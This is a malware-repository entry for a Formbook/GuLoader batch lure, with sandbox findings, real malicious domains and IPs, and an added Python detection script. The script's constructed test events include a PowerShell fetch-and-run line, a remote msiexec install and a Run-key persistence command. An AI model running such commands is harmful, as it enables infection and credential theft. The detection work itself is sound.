MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Formbook


Vendor detections: 13



SHA256 hash: 78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f
SHA3-384 hash: 814a0f9be3e7120de8ec7a6bf179dd096dababa7159ffb6914686055da88a7be822f04ebb44c0809571cadf9dc2b966f
SHA1 hash: a5159f8847f2f1a0902f92b75700ac09af806a68
MD5 hash: 98f890f320c9043a0bc3398896b838f2
humanhash: yellow-washington-carbon-kilo
File name: 25SZJA tervezet elérhetősége_a·pdf.bat
Signature: Formbook
File size: 3'013 bytes
First seen: 2026-03-24 08:38:57 UTC
Last seen: Never
File type: Batch (bat)
MIME type: text/plain
ssdeep: 48:zuVKMlx9qYZIiXJCXSb3YzklK4b7du7Z/d8wacMbohO5wNMBgBgOgS3D7mDB7JO:irx9qYZ55CX6YzmK4g0wacMbouwN8egW
Threatray: 2'463 similar samples on MalwareBazaar
TLSH: T1FE51B8B60B6322E13D520175F3DA074D9222A008834E478736EC549DADE27BC4333EF6
Magika: txt
Reporter: smica83
Tags: bat FormBook HUN

Intelligence


File Origin
# of uploads: 1
# of downloads: 71
Origin country: HU

Vendor Threat Intelligence

No detections

Malware family: n/a
ID: 1
File name: _78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f.txt
Verdict: Malicious activity
Analysis date: 2026-03-24 08:40:11 UTC
Tags: n/a

Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample

Result
Verdict: Clean
Maliciousness:

Behaviour
Connection attempt
Launching a process
Creating synchronization primitives
DNS request
Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: base64 cloudeye encrypted obfuscated powershell

Verdict: Malicious
File Type: ps1
Detections: Trojan-Downloader.PowerShell.Agent.sb

Result
Threat name: FormBook, GuLoader
Detection: malicious
Classification: troj.spyw.evad
Score: 100 / 100
Signature
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a MSI (Microsoft Installer) remotely
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for submitted file
Obfuscated command line found
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Potential PowerShell Command Line Obfuscation
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Unusual module load detection (module proxying)
Writes to foreign memory regions
Yara detected FormBook
Yara detected GuLoader
Behaviour
Behavior Graph (ID 1888049; sample: 25SZJA tervezet elérhe...; start date: 24/03/2026; architecture: WINDOWS; score: 100), rebuilt from the flattened graph dump as a process tree. Numbers in parentheses are the graph's node IDs; "injected" marks a node the graph shows as an injected image rather than a started process.

Network nodes attached to the root: www.3701157.xyz (Performs DNS queries to domains with low reputation), www.rightnova.site, and 17 other IPs or domains.
Root-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures.

Process tree:
- powershell.exe (11): Suspicious powershell command line found; Obfuscated command line found; Writes to foreign memory regions; 4 other signatures
  - msiexec.exe (20): Obfuscated command line found; Maps a DLL or memory area into another process; Installs a MSI (Microsoft Installer) remotely
    - JnNh9XJMY7b3ux.exe (40, injected): Maps a DLL or memory area into another process
      - comp.exe (58): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 4 other signatures
        - 70hfTjpfBq8.exe (67, injected): beyazmeramdis.com 78.142.209.251 (ports 49743, 49744, 49745; VERIDYEN Veridyen Bilisim Teknolojileri Sanayi ve Ticaret Li..., Turkey); 3701157.xyz 68.65.121.158 (ports 49732, 80; NAMECHEAP-NET, United States); 2 other IPs or domains
        - chrome.exe (70)
          - WerFault.exe (74)
        - firefox.exe (72)
    - cmd.exe (43): Obfuscated command line found
      - conhost.exe (61)
      - reg.exe (63)
    - msiexec.exe (45)
  - msiexec.exe (23): Unusual module load detection (module proxying)
  - conhost.exe (25)
- powershell.exe (14)
  - powershell.exe (27): Writes to foreign memory regions
    - msiexec.exe (47): 142.251.211.174 (ports 443, 49733; GOOGLE, United States); Installs a MSI (Microsoft Installer) remotely
      - msiexec.exe (65)
    - msiexec.exe (50)
  - conhost.exe (29)
- powershell.exe (16)
  - powershell.exe (31)
    - msiexec.exe (52)
    - msiexec.exe (54)
  - conhost.exe (33)
- cmd.exe (18)
  - powershell.exe (35): drive.google.com 142.250.188.14 (ports 443, 49718, 49728; GOOGLE, United States); drive.usercontent.google.com 142.251.211.161 (ports 443, 49719, 49729; GOOGLE, United States); Found suspicious powershell code related to unpacking or dynamic code loading
    - conhost.exe (56)
  - conhost.exe (38)
Verdict: Malicious
Threat: Trojan-Downloader.PowerShell.Agent

Threat name: Script-PowerShell.Trojan.GuLoader
Status: Malicious
First seen: 2026-03-23 12:11:36 UTC
File Type: Text
AV detection: 7 of 24 (29.17%)
Threat level: 5/5

Result
Malware family: guloader
Score: 10/10
Tags: family:guloader discovery downloader execution persistence privilege_escalation
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Event Triggered Execution: Installer Packages
System Location Discovery: System Language Discovery
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Contacts third-party web service commonly abused for C2
Use of msiexec (install) with remote resource
Badlisted process makes network request
Guloader family
Guloader,Cloudeye
Please note that we are no longer able to provide a coverage score for Virus Total.
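The vendor results above describe one execution chain: a .bat lure starts cmd.exe, cmd.exe starts PowerShell with an obfuscated command line that unpacks and loads code dynamically, PowerShell hands a remote package to msiexec, the injected payload (comp.exe) harvests browser and mail credentials, and persistence is set through a Run key. The following is an added example written for this page, not MalwareBazaar, ANY.RUN, Joe Sandbox or any other vendor's code: a small set of process-creation triage rules that flag exactly those behaviours and then score a process by the rules hit anywhere in its lineage, so a lone `msiexec /i local.msi` stays quiet while the chain as a whole lights up. The events are constructed Sysmon-style records; the paths, PIDs and the `example.invalid` URLs are placeholders (only the .bat file name is taken from this entry). The rule names, the three-rule threshold and the loader keyword list are the author's choices, not vendor logic.

```python
"""Lineage-aware triage of a .bat -> PowerShell -> msiexec -> Run-key chain.
Added example for this page, not MalwareBazaar or vendor code.  All events,
paths and URLs below are constructed placeholders."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
MSIEXEC = r"C:\Windows\System32\msiexec.exe"
REG = r"C:\Windows\System32\reg.exe"
EXPLORER = r"C:\Windows\explorer.exe"


def encode_ps(script: str) -> str:
    """powershell -EncodedCommand takes base64 over the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Inverse of encode_ps; '' for anything that is not such a blob."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


# Constructed stage-2 loader; example.invalid is a reserved, non-resolving name.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s2.ps1')"

SAMPLE_EVENTS = [  # constructed, not taken from the real analysis
    ProcEvent(900, 1, EXPLORER, "explorer.exe"),
    ProcEvent(1001, 900, CMD, r'cmd /c ""C:\Users\u\Downloads\25SZJA tervezet elérhetősége_a·pdf.bat""'),
    ProcEvent(1002, 1001, PS, "powershell -nop -w hidden -ep bypass -enc " + encode_ps(STAGE2)),
    ProcEvent(1003, 1002, MSIEXEC, "msiexec /i https://example.invalid/pkg.msi /qn"),
    ProcEvent(1004, 1003, r"C:\Users\u\AppData\Local\Temp\comp.exe", "comp.exe"),
    ProcEvent(1005, 1004, REG, r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d C:\Users\u\AppData\Local\Temp\comp.exe"),
    # benign noise the rules must not flag: local MSI install, interactive PowerShell
    ProcEvent(2001, 900, MSIEXEC, r"msiexec /i C:\Users\u\Downloads\7z.msi /qn"),
    ProcEvent(2002, 900, PS, "powershell -NoProfile -Command Get-Process"),
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run\b", re.I)
LOADER_MARKERS = ("iex", "invoke-expression", "downloadstring",
                  "frombase64string", "reflection.assembly")


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """pid -> list of per-process rule names hit (parent context via ppid)."""
    by_pid = {e.pid: e for e in events}
    findings = {}

    def hit(e, rule):
        findings.setdefault(e.pid, []).append(rule)

    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        pname = image_name(parent.image) if parent else ""
        cl = e.cmdline.lower()
        if name == "powershell.exe":
            if pname == "cmd.exe" and ".bat" in parent.cmdline.lower():
                hit(e, "powershell_from_batch")
            m = ENC_FLAG.search(e.cmdline)
            if m:
                hit(e, "encoded_command")
                # decode the blob and look for unpacking / dynamic loading
                if any(k in decode_ps(m.group(1)).lower() for k in LOADER_MARKERS):
                    hit(e, "dynamic_code_loading")
        elif name == "msiexec.exe":
            if URL.search(cl):
                hit(e, "msiexec_remote_package")
            if pname == "powershell.exe":
                hit(e, "msiexec_from_powershell")
        elif name == "reg.exe" and " add " in cl and RUN_KEY.search(cl):
            hit(e, "run_key_persistence")
    return findings


def chain_rules(events, findings, pid):
    """Distinct rules hit anywhere on pid's ancestor chain (pid included)."""
    by_pid = {e.pid: e for e in events}
    seen, rules = set(), set()
    while pid in by_pid and pid not in seen:   # seen-set guards against pid reuse loops
        seen.add(pid)
        rules.update(findings.get(pid, ()))
        pid = by_pid[pid].ppid
    return rules


def verdict(events, threshold=3):
    """pid -> sorted rules, for every process whose lineage hits >= threshold rules."""
    findings = triage(events)
    out = {}
    for e in events:
        rules = chain_rules(events, findings, e.pid)
        if len(rules) >= threshold:
            out[e.pid] = sorted(rules)
    return out
```

Running `verdict(SAMPLE_EVENTS)` flags the four processes from the PowerShell stage down to the reg.exe persistence step, while the benign local `msiexec` install and the interactive PowerShell session (both children of explorer.exe) produce no findings. Scoring on lineage rather than on the single event is what separates this chain from ordinary administrative use of the same binaries; in production the rules would be fed from Sysmon event ID 1 or EDR telemetry rather than the constructed list above.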

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments